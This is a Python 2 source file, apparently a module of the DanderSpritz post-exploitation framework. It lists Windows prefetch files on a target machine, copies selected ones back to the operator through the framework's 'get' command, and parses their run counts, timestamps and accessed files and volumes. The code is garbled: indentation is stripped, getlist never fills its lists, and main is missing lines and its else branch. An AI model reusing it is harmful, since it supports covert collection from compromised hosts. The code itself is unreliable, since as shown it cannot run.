235 lines
11 KiB
235 lines
11 KiB
import os
import sys
import codecs
from datetime import datetime, timedelta
from struct import unpack
import dsz, dsz.version.checks.windows
import ops, ops.cmd
from ops.pprint import pprint
def getsectionA(handle, offset, numentries):
sectionA = []
for i in range(0, numentries):
sectionA.append(fixendian(handle.read(4), 4))
return sectionA
def getsectionB(handle, offset, numentries):
sectionB = []
for i in range(0, numentries):
val1 = fixendian(handle.read(4), 4)
val2 = fixendian(handle.read(4), 4)
val3 = fixendian(handle.read(4), 4)
sectionB.append([val1, val2, val3])
return sectionB
def getsectionC(handle, offset, length):
sectionC = []
(files, thing) = codecs.getdecoder('utf_16')(handle.read(length), 'replace')
files = files.replace('\x00', '\n')
sectionC = files.strip().split('\n')
return sectionC
def getsectionD(handle, offset, numvols, length, version):
sectionD = []
for i in range(0, numvols):
data = {}
data['labeloffset'] = unpack('<i', handle.read(4))[0]
data['labellength'] = unpack('<i', handle.read(4))[0]
us = (int(fixendian(handle.read(8), 8), 16) / 10.0)
data['accesstimestamp'] = (datetime(1601, 1, 1) + timedelta(microseconds=us)).__str__()
data['volserial'] = fixendian(handle.read(4), 4)
data['subsec1offset'] = unpack('<i', handle.read(4))[0]
data['subsec1length'] = unpack('<i', handle.read(4))[0]
data['subsec2offset'] = unpack('<i', handle.read(4))[0]
data['subsec2length'] = unpack('<i', handle.read(4))[0]
if (version == 23):
data['vh9'] = unpack('<68s', handle.read(68))[0]
data['vh9'] = unpack('<4s', handle.read(4))[0]
data['vollabel'] = getvollabel(handle, offset, data['labeloffset'], data['labellength'])
data['subsec1'] = getDsubsection1(handle, offset, data['subsec1offset'], version)
data['subsec2'] = getDsubsection2(handle, offset, data['subsec2offset'], data['subsec2length'])
return sectionD
def getDsubsection1(handle, sectiondoffset, offset, version):
handle.seek((sectiondoffset + offset))
data = {}
data['vs1'] = unpack('<i', handle.read(4))[0]
data['numberentries'] = unpack('<i', handle.read(4))[0]
if (version == 23):
data['vs3'] = unpack('<4s', handle.read(4))[0]
data['entries'] = []
for i in range(0, data['numberentries']):
data['entries'].append(fixendian(handle.read(8), 8))
return data
def getDsubsection2(handle, sectiondoffset, offset, length):
handle.seek((sectiondoffset + offset))
data = []
for i in range(0, length):
strlength = unpack('<H', handle.read(2))[0]
unistring = codecs.getdecoder('utf_16')(handle.read((strlength * 2)), 'replace')[0].split('\x00')[0]
null = handle.read(2)
data.append([strlength, unistring])
return data
def getvollabel(handle, sectiondoffset, offset, length):
handle.seek((sectiondoffset + offset))
vollabel = handle.read((length * 2))
(vollabel, thing) = codecs.getdecoder('utf_16')(vollabel, 'replace')
return vollabel
def fixendian(bytes, length):
bytes = bytes.encode('hex')
packstring = ('2s' * length)
bytes = unpack(packstring, bytes)
bytes = tuple(reversed(bytes))
bytes = ''.join(map(str, bytes))
return bytes
def readfile(prefetchfile):
data = {}
file = open(prefetchfile, 'rb')
data['fileversion'] = unpack('<i', file.read(4))[0]
data['magicstring'] = unpack('<4s', file.read(4))[0]
data['osindicator'] = unpack('<i', file.read(4))[0]
data['prefetchfilelength'] = unpack('<i', file.read(4))[0]
data['exename'] = codecs.getdecoder('utf_16')(file.read(60), 'replace')[0].split('\x00')[0]
data['prefetchhash'] = fixendian(file.read(4), 4)
data['h7'] = fixendian(file.read(4), 4)
data['sectionaoffset'] = unpack('<i', file.read(4))[0]
data['sectionanumentries'] = unpack('<i', file.read(4))[0]
data['sectionboffset'] = unpack('<i', file.read(4))[0]
data['sectionbnumentries'] = unpack('<i', file.read(4))[0]
data['sectioncoffset'] = unpack('<i', file.read(4))[0]
data['sectionclength'] = unpack('<i', file.read(4))[0]
data['sectiondoffset'] = unpack('<i', file.read(4))[0]
data['sectiondnumvols'] = unpack('<i', file.read(4))[0]
data['sectiondlength'] = unpack('<i', file.read(4))[0]
if (data['fileversion'] == 23):
data['h17'] = fixendian(file.read(4), 4)
data['h18'] = fixendian(file.read(4), 4)
us = (int(fixendian(file.read(8), 8), 16) / 10.0)
data['lastexectimestamp'] = (datetime(1601, 1, 1) + timedelta(microseconds=us)).__str__()
data['h20'] = fixendian(file.read(16), 16)
data['numexec'] = unpack('<i', file.read(4))[0]
data['h22'] = fixendian(file.read(4), 4)
data['sectiona'] = getsectionA(file, data['sectionaoffset'], data['sectionanumentries'])
data['sectionb'] = getsectionB(file, data['sectionboffset'], data['sectionbnumentries'])
data['sectionc'] = getsectionC(file, data['sectioncoffset'], data['sectionclength'])
data['sectiond'] = getsectionD(file, data['sectiondoffset'], data['sectiondnumvols'], data['sectiondlength'], data['fileversion'])
return data
def getpretchfiles(prefetchdir):
cmd = ops.cmd.getDszCommand('dir')
cmd.mask = '*.pf'
cmd.path = prefetchdir
obj = cmd.execute()
prefetchfiles = []
index = 1
if cmd.success:
for dir in obj.diritem:
for file in dir.fileitem:
prefetchfiles.append({'index': index, 'name': file.name, 'size': file.size, 'path': dir.path, 'accessed': file.filetimes.accessed.time.split('.')[0].replace('T', ' '), 'modified': file.filetimes.modified.time.split('.')[0].replace('T', ' '), 'created': file.filetimes.created.time.split('.')[0].replace('T', ' ')})
index += 1
return prefetchfiles
def getfile(file):
cmd = ops.cmd.getDszCommand('get')
cmd.arglist = [('-mask %s -path %s' % (file['name'], file['path']))]
obj = cmd.execute()
if cmd.success:
return os.path.join(dsz.lp.GetLogsDirectory(), obj.filelocalname[0].subdir, obj.filelocalname[0].localname)
return None
def getlist(itemlist):
want = ''
want = dsz.ui.GetString('Please provide a list of indexes you would like (ex: "1,3,5-7,13"): ', want)
wantlist = want.split(',')
intlist = []
for item in wantlist:
if (len(item.split('-')) == 2):
itemrange = item.split('-')
for integer in range(int(itemrange[0]), (int(itemrange[1]) + 1)):
outlist = []
for item in itemlist:
if (item['index'] in intlist):
return outlist
def main():
if (len(sys.argv) == 1):
dsz.ui.Echo('= Getting a list of prefetch files =')
prefetch = getpretchfiles('c:\\windows\\prefetch')
pprint(prefetch, header=['Index', 'Name', 'Size', 'Created', 'Modified', 'Accessed'], dictorder=['index', 'name', 'size', 'created', 'modified', 'accessed'])
dsz.ui.Echo('Found the above files in the prefetch, please select which you would like to pull and parse', dsz.GOOD)
wantlist = getlist(prefetch)
shortparse = []
for file in wantlist:
localfile = getfile(file)
file['localfile'] = localfile
data = readfile(localfile)
good_data = {'index': file['index'], 'name': file['name'], 'bytes': data['prefetchfilelength'], 'runs': data['numexec'], 'last': data['lastexectimestamp'], 'localfile': file['localfile'], 'sectionc': data['sectionc'], 'sectiond': data['sectiond']}
print ''
dsz.ui.Echo('=========== Short Parse ============')
pprint(shortparse, header=['Index', 'Name', 'Byte Length', 'Number of Runs', 'Last Execute Time'], dictorder=['index', 'name', 'bytes', 'runs', 'last'])
dsz.ui.Echo('Of the files you pulled back, which would you like to see the called files?', dsz.GOOD)
parselist = getlist(shortparse)
print ''
for file in parselist:
bannerstring = ('================ %s ====================' % file['name'])
bannercap = ('=' * len(bannerstring))
dsz.ui.Echo(bannercap, dsz.GOOD)
dsz.ui.Echo(bannerstring, dsz.GOOD)
dsz.ui.Echo(bannercap, dsz.GOOD)
dsz.ui.Echo('Files Accessed:')
for dll in file['sectionc']:
dsz.ui.Echo(('\t\t%s' % ops.utf8(dll)))
dsz.ui.Echo('\\Volumes Accessed:')
for sectiond in file['sectiond']:
dsz.ui.Echo(('\tVolume Label: %s' % sectiond['vollabel']))
dsz.ui.Echo(('\tVolume Serial: %s' % sectiond['volserial']))
dsz.ui.Echo(('\tAccess timestamp: %s' % sectiond['accesstimestamp']))
dsz.ui.Echo('\tDirectories Accessed:')
for directory in sectiond['subsec2']:
dsz.ui.Echo(('\t\t%s' % ops.utf8(directory[1])))
prefetchFile = sys.argv[1]
data = readfile(prefetchFile)
good_data = [{'bytes': data['prefetchfilelength'], 'runs': data['numexec'], 'last': data['lastexectimestamp'], 'sectionc': data['sectionc'], 'sectiond': data['sectiond']}]
pprint(good_data, header=['Byte Length', 'Number of Runs', 'Last Execute Time'], dictorder=['bytes', 'runs', 'last'])
dsz.ui.Echo('Files Accessed:')
for dll in data['sectionc']:
dsz.ui.Echo(('\t\t%s' % ops.utf8(dll)))
dsz.ui.Echo('\\Volumes Accessed:')
for sectiond in data['sectiond']:
dsz.ui.Echo(('\tVolume Label: %s' % sectiond['vollabel']))
dsz.ui.Echo(('\tVolume Serial: %s' % sectiond['volserial']))
dsz.ui.Echo(('\tAccess timestamp: %s' % sectiond['accesstimestamp']))
dsz.ui.Echo('\tDirectories Accessed:')
for directory in sectiond['subsec2']:
dsz.ui.Echo(('\t\t%s' % ops.utf8(directory[1])))
if (__name__ == '__main__'):
main() |